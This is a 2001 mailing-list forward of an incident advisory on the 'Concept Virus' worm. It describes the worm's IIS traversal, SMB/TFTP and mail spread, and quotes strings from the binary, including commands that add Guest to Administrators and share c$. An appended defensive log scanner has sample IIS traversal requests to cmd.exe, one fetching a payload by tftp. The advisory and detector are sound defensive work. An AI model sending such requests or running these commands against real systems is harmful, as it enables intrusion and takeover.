From: Christopher Misra <[log in to unmask]>
To: [log in to unmask]
Subject: [unisog] Concept Virus(CV) V.5 - Advisory and Quick analysis (fwd)
Date: Tue, 18 Sep 2001 15:44:00 GMT
X-Mailer: CorporateTime Outlook Connector 3.1 (R.3.1.3.0815)
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

Hi,

Forwarded from the incidents list at securityfocus.

                                - Chris
------- Forwarded Message

Message-ID: <[log in to unmask]>
Date: Tue, 18 Sep 2001 16:47:00 +0200
From: Olle Segerdahl <[log in to unmask]>
X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: [log in to unmask], [log in to unmask]
Subject: Concept Virus(CV) V.5 - Advisory and Quick analysis
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
--

Hi all!


We've all just been hit by a VERY aggressive worm/virus.

Quick analysis indicates that it propagates itself in
a number of different ways:

Through use of IIS UNICODE directory traversal coupled
with the recent IIS .dll privilege escalation attack.
It uses SMB/CIFS and TFTP to get the worm payload.

Through MAPI mails (probably to all of addressbook).

Other ways of spreading may be possible, but we haven't
yet had the time to properly analyse the worm/virus.

It seems to share "c:\" via SMB/CIFS as "c$" and
the worm/virus also adds the "Guest" user and "Guests"
group to the local "Administrators" group....


Interesting strings in binary:

Concept Virus(CV) V.5, Copyright(C)2001  R.P.China

SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
net


More info as we come upon it.....

/olle

- ----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com


------- End of Forwarded Message


-- 
Christopher Misra                                    Network Analyst
OIT/Network Systems and Services                        LGRC A153
University of Massachusetts                         Amherst, MA  01003
E-mail: [log in to unmask]
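The IIS UNICODE directory traversal that Olle mentions as the worm's first propagation vector leaves a recognisable trace in web-server logs: a request whose encoded path climbs above the web root and lands on cmd.exe, often with a query string that calls tftp to pull the payload. The script below is an added example, not code from the original message or from any of its authors. It assumes IIS 4/5's lenient URL decoding, where the overlong two-byte UTF-8 sequences %c0%af and %c1%1c decode to '/' and '\' after the path check has already run (the MS00-078 "Web Server Folder Traversal" bug), and it also applies a second decode pass so that double-encoded escapes such as %255c fold to '\' (the later IIS "superfluous decode" bug). The log lines, the client addresses and the payload file name are constructed for the example and are not captured data.

```python
"""Flag IIS log requests that use encoded directory traversal to reach
cmd.exe or fetch a payload with tftp (added example, not from the page)."""
import re

# Constructed sample in W3C extended format with the fields
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status.
SAMPLE_LOG = """\
2001-09-18 14:47:01 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-09-18 14:47:02 10.0.0.5 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.5+GET+payload.dll 200
2001-09-18 14:47:03 10.0.0.5 GET /msadc/..%255c../..%255c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 14:47:04 10.0.0.9 GET /default.htm - 200
2001-09-18 14:47:05 10.0.0.9 GET /images/..%2fhome/logo.gif - 200
"""

PCT = re.compile(rb"%([0-9A-Fa-f]{2})")
SUSPICIOUS = re.compile(r"cmd\.exe|\btftp\b", re.IGNORECASE)


def pct_decode(data: bytes) -> bytes:
    """One pass of %XX decoding on raw bytes."""
    return PCT.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def fold_overlong(data: bytes) -> bytes:
    """Collapse two-byte sequences with lead byte 0xC0/0xC1 into the
    ASCII byte they smuggle in, masking the second byte the way a
    lenient decoder does (so %c1%9c and the malformed %c1%1c both
    become '\\'). This models the assumed IIS 4/5 behaviour."""
    out = bytearray()
    i = 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def normalize(stem: str) -> str:
    """Decode a URI stem the way the vulnerable server ends up seeing it:
    two percent-decode passes, overlong folding, backslash to slash."""
    data = stem.encode("latin-1", "replace")
    data = pct_decode(pct_decode(data))
    return fold_overlong(data).decode("latin-1").replace("\\", "/")


def escapes_root(path: str) -> bool:
    """True if the '..' segments climb above the virtual root. An encoded
    '..' that stays inside the tree (/a/../b) is not flagged."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def inspect(line: str):
    """Return a finding dict for a suspicious log line, else None."""
    parts = line.split()
    if len(parts) < 7:
        return None
    _date, _time, client, _method, stem, query, status = parts[:7]
    path = normalize(stem)
    reasons = []
    if escapes_root(path):
        reasons.append("traversal escapes web root")
    if SUSPICIOUS.search(path):
        reasons.append("command interpreter in path")
    if SUSPICIOUS.search(normalize(query.replace("+", " "))):
        reasons.append("tftp/cmd in query string")
    if not reasons:
        return None
    # sc-status 200 means the server actually served (executed) the request.
    return {"client": client, "path": path, "status": status, "reasons": reasons}


def scan(log_text: str) -> list:
    """Run inspect() over every line and keep the findings."""
    return [f for f in map(inspect, log_text.splitlines()) if f]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["path"], "; ".join(hit["reasons"]))
```

The decode step matters more than the pattern match: a plain grep for "cmd.exe" misses nothing in these samples, but a grep for "/../" misses every one of the encoded lines, while an unencoded "/images/..%2fhome" stays inside the tree and is correctly left alone. On a real host, treat a 200 on one of these requests as confirmation that the traversal worked, and follow it with the local checks the message itself suggests: whether c$ is now shared from the lanmanserver Shares key and whether Guest has been added to the local Administrators group.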